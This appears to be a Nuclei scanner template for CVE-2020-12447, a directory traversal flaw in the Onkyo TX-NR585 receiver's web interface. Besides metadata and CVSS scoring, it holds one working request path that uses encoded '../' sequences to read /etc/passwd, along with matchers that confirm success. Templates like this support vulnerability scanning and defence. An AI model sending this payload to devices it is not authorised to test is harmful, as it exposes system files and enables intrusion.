32 lines
920 B
YAML
32 lines
920 B
YAML
|
id: CVE-2020-12447
|
||
|
info:
|
||
|
name: Onkyo TX-NR585 Web Interface - Directory Traversal
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
|
||
|
reference:
|
||
|
- https://blog.spookysec.net/onkyo-lfi
|
||
|
- https://www.cvedetails.com/cve/CVE-2020-12447
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2020-12447
|
||
|
cwe-id: CWE-22
|
||
|
tags: cve,cve2020,onkyo,lfi,traversal
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|